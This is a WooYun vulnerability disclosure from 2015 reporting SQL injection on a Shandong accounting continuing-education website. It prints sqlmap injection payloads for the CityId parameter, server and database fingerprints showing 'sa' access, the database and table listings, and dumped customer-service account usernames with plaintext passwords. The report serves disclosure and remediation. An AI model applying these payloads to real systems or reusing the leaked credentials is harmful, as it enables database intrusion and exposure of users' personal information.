当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160673

漏洞标题:山东会计人员继续教育网SQL注入涉及大量个人信息泄露

相关厂商:山东会计人员继续教育网

漏洞作者: 路人甲

提交时间:2015-12-17 23:14

修复时间:2016-02-01 19:48

公开时间:2016-02-01 19:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-17: 细节已通知厂商并且等待厂商处理中
2015-12-21: 厂商已经确认,细节仅向厂商公开
2015-12-31: 细节向核心白帽子及相关领域专家公开
2016-01-10: 细节向普通白帽子公开
2016-01-20: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

该站点对输入参数过滤不当导致SQL注入,可泄露大量个人信息

详细说明:

漏洞页面:http://**.**.**.**/user/City_ajax.aspx?CityId=798729681522

Place: GET
Parameter: CityId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CityId=798729681522' AND 7538=7538 AND 'Ekhs'='Ekhs
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: CityId=798729681522' AND 6928=CONVERT(INT,(CHAR(58)+CHAR(112)+CHAR(105)+CHAR(115)+CHAR(58)+(SELECT (CASE WHEN (6928=6928) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(116)+CHAR(101)+CHAR(115)+CHAR(58))) AND 'Iogy'='Iogy
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: CityId=798729681522' UNION ALL SELECT NULL,CHAR(58)+CHAR(112)+CHAR(105)+CHAR(115)+CHAR(58)+CHAR(71)+CHAR(71)+CHAR(102)+CHAR(110)+CHAR(105)+CHAR(119)+CHAR(70)+CHAR(117)+CHAR(77)+CHAR(86)+CHAR(58)+CHAR(116)+CHAR(101)+CHAR(115)+CHAR(58),NULL-- 
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [12]:
[*] Bak_RxExam2014
[*] CheShi
[*] kjzfd
[*] master
[*] model
[*] msdb
[*] PowerEducation
[*] ReportServer
[*] ReportServerTempDB
[*] RxEducation2013
[*] RxExam2014
[*] tempdb
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS operating system: Windows 7
back-end DBMS: active fingerprint: Microsoft SQL Server 2008
               banner parsing fingerprint: Microsoft SQL Server 2008 R2 Service Pack 0 version 10.50.1600.1
banner:
---
Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) 
	Apr  2 2010 15:48:46 
	Copyright (c) Microsoft Corporation
	Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7600: )
---
current user:    'sa'
current database:    'RxEducation2013'

漏洞证明:

web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: RxEducation2013
[177 tables]
+---------------------------------+
| dbo.RX_Shop_Cart                |
| dbo.RX_Shop_Deposit             |
| dbo.RX_Shop_OrderDetail         |
| dbo.RX_Shop_Orders              |
| dbo.RX_Shop_ProParam            |
| dbo.RX_Shop_Product             |
| dbo.RX_Shop_ProductClass        |
| dbo.RX_Shop_ProductMixDetail    |
| dbo.RX_Shop_School              |
| dbo.UserFinish                  |
| dbo.UserPayView                 |
| dbo.UserSoreView                |
| **.**.**.**pare_order               |
| dbo.fs_Attachments              |
| dbo.fs_Collect_News             |
| dbo.fs_Collect_Rule             |
| dbo.fs_Collect_RuleApply        |
| dbo.fs_Collect_Site             |
| dbo.fs_Collect_SiteFolder       |
| dbo.fs_News_URL                 |
| dbo.fs_User_URL                 |
| dbo.fs_User_URLClass            |
| dbo.fs_ads                      |
| dbo.fs_ads_class                |
| dbo.fs_ads_stat                 |
| dbo.fs_adstxt                   |
| dbo.fs_api_commentary           |
| dbo.fs_api_faviate              |
| dbo.fs_api_navi                 |
| dbo.fs_classdroptemplet         |
| dbo.fs_customform               |
| dbo.fs_customform_item          |
| dbo.fs_define_class             |
| dbo.fs_define_data              |
| dbo.fs_define_save              |
| dbo.fs_friend_class             |
| dbo.fs_friend_link              |
| dbo.fs_friend_pram              |
| dbo.fs_news                     |
| dbo.fs_news_Class               |
| dbo.fs_news_Gen                 |
| dbo.fs_news_JS                  |
| dbo.fs_news_JSFile              |
| dbo.fs_news_JST_Class           |
| dbo.fs_news_JSTemplet           |
| dbo.fs_news_page                |
| dbo.fs_news_site                |
| dbo.fs_news_special             |
| dbo.fs_news_sub                 |
| dbo.fs_news_topline             |
| dbo.fs_news_unNews              |
| dbo.fs_news_vote                |
| dbo.fs_newsdroptemplet          |
| dbo.fs_old_news                 |
| dbo.fs_special_news             |
| dbo.fs_specialdroptemplet       |
| dbo.fs_stat_Info                |
| dbo.fs_stat_class               |
| dbo.fs_stat_content             |
| dbo.fs_stat_param               |
| dbo.fs_sys_City                 |
| dbo.fs_sys_Help                 |
| dbo.fs_sys_Label                |
| dbo.fs_sys_LabelClass           |
| dbo.fs_sys_LabelFree            |
| dbo.fs_sys_LabelStyle           |
| dbo.fs_sys_PramUser             |
| dbo.fs_sys_Pramother            |
| dbo.fs_sys_User                 |
| dbo.fs_sys_UserLevel            |
| dbo.fs_sys_User_bak             |
| dbo.fs_sys_admin                |
| dbo.fs_sys_admingroup           |
| dbo.fs_sys_logs                 |
| dbo.fs_sys_newsIndex            |
| dbo.fs_sys_param                |
| dbo.fs_sys_parmConstr           |
| dbo.fs_sys_parmPrint            |
| dbo.fs_sys_styleclass           |
| dbo.fs_sys_userfields           |
| dbo.fs_sys_userother            |
| dbo.fs_user_Card                |
| dbo.fs_user_Constr              |
| dbo.fs_user_ConstrClass         |
| dbo.fs_user_Discuss             |
| dbo.fs_user_DiscussActive       |
| dbo.fs_user_DiscussActiveMember |
| dbo.fs_user_DiscussClass        |
| dbo.fs_user_DiscussContribute   |
| dbo.fs_user_DiscussMember       |
| dbo.fs_user_DiscussTopic        |
| dbo.fs_user_Friend              |
| dbo.fs_user_FriendClass         |
| dbo.fs_user_Ghistory            |
| dbo.fs_user_Group               |
| dbo.fs_user_Guser               |
| dbo.fs_user_MessFiles           |
| dbo.fs_user_Message             |
| dbo.fs_user_MessageLink         |
| dbo.fs_user_Photo               |
| dbo.fs_user_Photoalbum          |
| dbo.fs_user_PhotoalbumClass     |
| dbo.fs_user_Requestinformation  |
| dbo.fs_user_constrPay           |
| dbo.fs_user_news                |
| dbo.fs_user_note                |
| dbo.fs_user_userlogs            |
| dbo.fs_user_vote                |
| dbo.fs_vote_Item                |
| dbo.fs_vote_Steps               |
| dbo.fs_vote_class               |
| dbo.fs_vote_manage              |
| dbo.fs_vote_param               |
| dbo.fs_vote_title               |
| dbo.jinan_licheng               |
| dbo.kefu_TreeList               |
| dbo.kefu_Users                  |
| dbo.rx_City                     |
| dbo.rx_Config                   |
| dbo.rx_County                   |
| dbo.rx_Course                   |
| dbo.rx_CourseType               |
| dbo.rx_CreditItem               |
| dbo.rx_CreditScore              |
| dbo.rx_DataFinishToLc           |
| dbo.rx_DataToLc                 |
| dbo.rx_ExamRecords              |
| dbo.rx_ExtLogs                  |
| dbo.rx_Finance                  |
| dbo.rx_Items                    |
| dbo.rx_LockStudy                |
| dbo.rx_Nodes                    |
| dbo.rx_Order_Detail             |
| dbo.rx_Orders                   |
| dbo.rx_Paper                    |
| dbo.rx_PaperDetails             |
| dbo.rx_PaperDetails_A           |
| dbo.rx_PaperRecords             |
| dbo.rx_PaperStructure           |
| dbo.rx_PayOrder                 |
| dbo.rx_Payment                  |
| dbo.rx_Province                 |
| dbo.rx_QQgroup                  |
| dbo.rx_Reasons                  |
| dbo.rx_STApply                  |
| dbo.rx_SelectCourse             |
| dbo.rx_ShortMsg                 |
| dbo.rx_ShuoMing                 |
| dbo.rx_StudentAnswer            |
| dbo.rx_StudentAnswer_A          |
| dbo.rx_Teacher                  |
| dbo.rx_TiYan                    |
| dbo.rx_TimeRecords              |
| dbo.rx_University               |
| dbo.rx_api_navi                 |
| dbo.rx_ceshiUser                |
| dbo.rx_cityIsApply              |
| dbo.rx_cityOldUserCard          |
| dbo.rx_citypay                  |
| dbo.rx_courseType2              |
| dbo.rx_fankuiQuestion           |
| dbo.rx_fankuiType               |
| dbo.rx_fankui_result            |
| dbo.rx_limitInfoCity            |
| dbo.rx_sfz                      |
| dbo.rx_temp                     |
| dbo.rx_userLog                  |
| dbo.rx_weixin                   |
| dbo.sysdiagrams                 |
| dbo.tel_lz                      |
| dbo.tel_yc                      |
| dbo.tel_yz                      |
| dbo.tk_order                    |
| dbo.yl_order                    |
| dbo.yx_order                    |
| dbo.z_chengwu                   |
| dbo.z_chengwu1                  |
+---------------------------------+
Database: RxEducation2013
Table: dbo.kefu_Users
[4 entries]
+----------+
| userName |
+----------+
| zcy      |
| czg      |
| ljl      |
| kefu     |
+----------+
Table: dbo.kefu_Users
[4 entries]
+-----+
| pwd |
+-----+
| zcy |
| czg |
| 1   |
| 1   |
+-----+


dbo.fs_sys_User 表中存放大量个人身份信息

user.jpg

修复方案:

过滤客户端提交的危险字符

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-21 16:42

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置.

最新状态:

暂无